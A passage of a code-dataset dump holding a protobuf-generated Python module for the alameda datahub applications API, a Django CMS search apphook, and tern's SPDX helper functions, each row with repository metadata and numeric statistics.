| 25.028571 | 91 | 0.679224 | 472 | 4,380 | 6.120763 | 0.413136 | 0.067497 | 0.053306 | 0.060575 | 0.178262 | 0.146417 | 0.09242 | 0.09242 | 0.041537 | 0 | 0 | 0.010617 | 0.182877 | 4,380 | 174 | 92 | 25.172414 | 0.796591 | 0.246119 | 0 | 0.038095 | 1 | 0 | 0.534067 | 0.387412 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.057143 | 0.019048 | 0 | 0.019048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e027464baf813e0d049a2e9cf3bc3d930a2f706b | 11,714 | py | Python | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alameda_api/v1alpha1/datahub/applications/services.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from alameda_api.v1alpha1.datahub.applications import applications_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2
from alameda_api.v1alpha1.datahub.applications import types_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2
from alameda_api.v1alpha1.datahub.schemas import types_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alameda_api/v1alpha1/datahub/applications/services.proto',
package='containersai.alameda.v1alpha1.datahub.applications',
syntax='proto3',
serialized_options=_b('ZFgithub.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications'),
serialized_pb=_b('\n8alameda_api/v1alpha1/datahub/applications/services.proto\x12\x32\x63ontainersai.alameda.v1alpha1.datahub.applications\x1a<alameda_api/v1alpha1/datahub/applications/applications.proto\x1a\x35\x61lameda_api/v1alpha1/datahub/applications/types.proto\x1a\x30\x61lameda_api/v1alpha1/datahub/schemas/types.proto\x1a\x17google/rpc/status.proto\"\xc7\x01\n\x19\x43reateApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12Z\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x44.containersai.alameda.v1alpha1.datahub.applications.WriteApplication\"\xc4\x01\n\x17ListApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12Y\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x43.containersai.alameda.v1alpha1.datahub.applications.ReadApplication\"\x95\x01\n\x18ListApplicationsResponse\x12\"\n\x06status\x18\x01 \x01(\x0b\x32\x12.google.rpc.Status\x12U\n\x0c\x61pplications\x18\x02 \x01(\x0b\x32?.containersai.alameda.v1alpha1.datahub.applications.Application\"\xc8\x01\n\x19\x44\x65leteApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12[\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x45.containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationBHZFgithub.com/containers-ai/api/alameda_api/v1alpha1/datahub/applicationsb\x06proto3')
,
dependencies=[alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2.DESCRIPTOR,alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2.DESCRIPTOR,alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_CREATEAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='CreateApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=305,
serialized_end=504,
)
_LISTAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='ListApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=507,
serialized_end=703,
)
_LISTAPPLICATIONSRESPONSE = _descriptor.Descriptor(
name='ListApplicationsResponse',
full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='status', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse.applications', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=706,
serialized_end=855,
)
_DELETEAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='DeleteApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=858,
serialized_end=1058,
)
_CREATEAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_CREATEAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._WRITEAPPLICATION
_LISTAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_LISTAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._READAPPLICATION
_LISTAPPLICATIONSRESPONSE.fields_by_name['status'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_LISTAPPLICATIONSRESPONSE.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2._APPLICATION
_DELETEAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_DELETEAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._DELETEAPPLICATION
DESCRIPTOR.message_types_by_name['CreateApplicationsRequest'] = _CREATEAPPLICATIONSREQUEST
DESCRIPTOR.message_types_by_name['ListApplicationsRequest'] = _LISTAPPLICATIONSREQUEST
DESCRIPTOR.message_types_by_name['ListApplicationsResponse'] = _LISTAPPLICATIONSRESPONSE
DESCRIPTOR.message_types_by_name['DeleteApplicationsRequest'] = _DELETEAPPLICATIONSREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CreateApplicationsRequest = _reflection.GeneratedProtocolMessageType('CreateApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest)
})
_sym_db.RegisterMessage(CreateApplicationsRequest)
ListApplicationsRequest = _reflection.GeneratedProtocolMessageType('ListApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest)
})
_sym_db.RegisterMessage(ListApplicationsRequest)
ListApplicationsResponse = _reflection.GeneratedProtocolMessageType('ListApplicationsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTAPPLICATIONSRESPONSE,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse)
})
_sym_db.RegisterMessage(ListApplicationsResponse)
DeleteApplicationsRequest = _reflection.GeneratedProtocolMessageType('DeleteApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest)
})
_sym_db.RegisterMessage(DeleteApplicationsRequest)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 50.930435 | 1,465 | 0.814837 | 1,326 | 11,714 | 6.837858 | 0.122172 | 0.066174 | 0.101246 | 0.089997 | 0.702879 | 0.655454 | 0.634168 | 0.605934 | 0.523657 | 0.521451 | 0 | 0.03634 | 0.083831 | 11,714 | 229 | 1,466 | 51.152838 | 0.808517 | 0.057453 | 0 | 0.609137 | 1 | 0.005076 | 0.309673 | 0.282658 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045685 | 0 | 0.045685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e04e43c85e6c8808703e6cd3c202d5d56239837d | 452 | py | Python | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from . import DEFAULT_APP_NAMESPACE
class SearchApp(CMSApp):
name = _('Search')
app_name = DEFAULT_APP_NAMESPACE
urls = ['js_search.urls']
def get_urls(self, *args, **kwargs):
return self.urls
apphook_pool.register(SearchApp)
| 20.545455 | 55 | 0.738938 | 61 | 452 | 5.163934 | 0.57377 | 0.104762 | 0.120635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002667 | 0.170354 | 452 | 21 | 56 | 21.52381 | 0.837333 | 0.04646 | 0 | 0 | 0 | 0 | 0.04662 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.416667 | 0.083333 | 0.916667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e071ac7673b0f0b844b265f1c255e94a353e5a78 | 5,741 | py | Python | tern/formats/spdx/spdx_common.py | KerinPithawala/tern | 4dfbd780861aad169a5202d0961df67dcfc8be41 | [
"BSD-2-Clause"
] | 325 | 2020-04-18T07:31:56.000Z | 2022-03-30T00:50:10.000Z | tern/formats/spdx/spdx_common.py | KerinPithawala/tern | 4dfbd780861aad169a5202d0961df67dcfc8be41 | [
"BSD-2-Clause"
] | 401 | 2020-04-10T13:08:28.000Z | 2022-03-31T21:31:28.000Z | tern/formats/spdx/spdx_common.py | KerinPithawala/tern | 4dfbd780861aad169a5202d0961df67dcfc8be41 | [
"BSD-2-Clause"
] | 113 | 2020-04-24T00:21:25.000Z | 2022-03-31T09:40:36.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
"""
Common functions that are useful for both JSON and Tag-value document creation
"""
import datetime
import hashlib
import logging
import re
import uuid
from tern.utils import constants
from tern.formats.spdx.spdxtagvalue import formats as spdx_formats
# global logger
logger = logging.getLogger(constants.logger_name)
###################
# General Helpers #
###################
def get_uuid():
""" Return a UUID string"""
return str(uuid.uuid4())
def get_timestamp():
"""Return a timestamp"""
return datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
def get_string_id(string):
""" Return a unique identifier for the given string"""
return hashlib.sha256(string.encode('utf-8')).hexdigest()[-7:]
def get_license_ref(license_string):
""" For SPDX tag-value format, return a LicenseRef string """
return 'LicenseRef-' + get_string_id(license_string)
########################
# Common Image Helpers #
########################
def get_image_spdxref(image_obj):
'''Given the image object, return an SPDX reference ID'''
# here we return the image name, tag and id
return 'SPDXRef-{}'.format(image_obj.get_human_readable_id())
########################
# Common Layer Helpers #
########################
def get_file_licenses(filedata):
'''Return a unique list of file licenses'''
return list(set(filedata.licenses))
def get_layer_licenses(layer_obj):
'''Return a list of unique licenses from the files analyzed
in the layer object. It is assumed that the files were analyzed and
there should be some license expressions. If there are not, an empty list
is returned'''
licenses = set()
for filedata in layer_obj.files:
# we will use the SPDX license expressions here as they will be
# valid SPDX license identifiers
if filedata.licenses:
for lic in get_file_licenses(filedata):
licenses.add(lic)
return list(licenses)
def get_layer_spdxref(layer_obj):
'''Given the layer object, return an SPDX reference ID'''
# here we return the shortened diff_id of the layer
return 'SPDXRef-{}'.format(layer_obj.diff_id[:10])
def get_layer_spdxref_snapshot(timestamp):
"""Given the layer object created at container build time, return an
SPDX reference ID. For this case, a layer's diff_id and filesystem hash
is not known so we will provide a generic ID"""
return 'SPDXRef-snapshot-{}'.format(timestamp)
def get_layer_verification_code(layer_obj):
'''Calculate the verification code from the files in an image layer. This
assumes that layer_obj.files_analyzed is True. The implementation follows
the algorithm in the SPDX spec v 2.1 which requires SHA1 to be used to
calculate the checksums of the file and the final verification code'''
sha1_list = []
for filedata in layer_obj.files:
filesha = filedata.get_checksum('sha1')
if not filesha:
# we cannot create a verification code, hence file generation
# is aborted
logger.critical(
'File %s does not have a sha1 checksum. Failed to generate '
'a SPDX tag-value report', filedata.path)
return None
sha1_list.append(filesha)
sha1_list.sort()
sha1s = ''.join(sha1_list)
return hashlib.sha1(sha1s.encode('utf-8')).hexdigest() # nosec
def get_layer_checksum(layer_obj):
'''Return a SPDX formatted checksum value. It should be of the form:
checksum_type: <checksum>'''
return '{}: {}'.format(layer_obj.checksum_type.upper(), layer_obj.checksum)
##########################
# Common Package Helpers #
##########################
def get_package_spdxref(package_obj):
'''Given the package object, return an SPDX reference ID'''
pkg_ref = spdx_formats.package_id.format(name=package_obj.name,
ver=package_obj.version)
# replace all the strings that SPDX doesn't like
clean_pkg_ref = re.sub(r'[:+~]', r'-', pkg_ref)
return 'SPDXRef-{}'.format(clean_pkg_ref)
#######################
# Common File Helpers #
#######################
def get_file_spdxref(filedata, layer_id):
'''Given a FileData object, return a unique identifier for the SPDX
document. According to the spec, this should be of the form: SPDXRef-<id>
We will use a combination of the file name, checksum and layer_id and
calculate a hash of this string'''
file_string = filedata.path + filedata.checksum[:7] + layer_id
fileid = get_string_id(file_string)
return 'SPDXRef-{}'.format(fileid)
def get_file_checksum(filedata):
'''Given a FileData object, return the checksum required by SPDX.
This should be of the form: <checksum_type>: <checksum>
Currently, the spec requires a SHA1 checksum'''
return '{}: {}'.format('SHA1', filedata.get_checksum('sha1'))
def get_file_notice(filedata):
'''Return a formatted string with all copyrights found in a file. Return
an empty string if there are no copyrights'''
notice = ''
for cp in filedata.copyrights:
notice = notice + cp + '\n'
return notice
def get_file_comment(filedata):
'''Return a formatted comment string with all file level notices. Return
an empty string if no notices are present'''
comment = ''
for origin in filedata.origins.origins:
comment = comment + '{}:'.format(origin.origin_str) + '\n'
for notice in origin.notices:
comment = comment + \
'{}: {}'.format(notice.level, notice.message) + '\n'
return comment
| 32.994253 | 79 | 0.659467 | 771 | 5,741 | 4.797665 | 0.268482 | 0.025953 | 0.017572 | 0.022709 | 0.11814 | 0.088132 | 0.043796 | 0.043796 | 0.02379 | 0.02379 | 0 | 0.006813 | 0.207455 | 5,741 | 173 | 80 | 33.184971 | 0.806154 | 0.410904 | 0 | 0.028571 | 0 | 0 | 0.07537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.228571 | false | 0 | 0.1 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.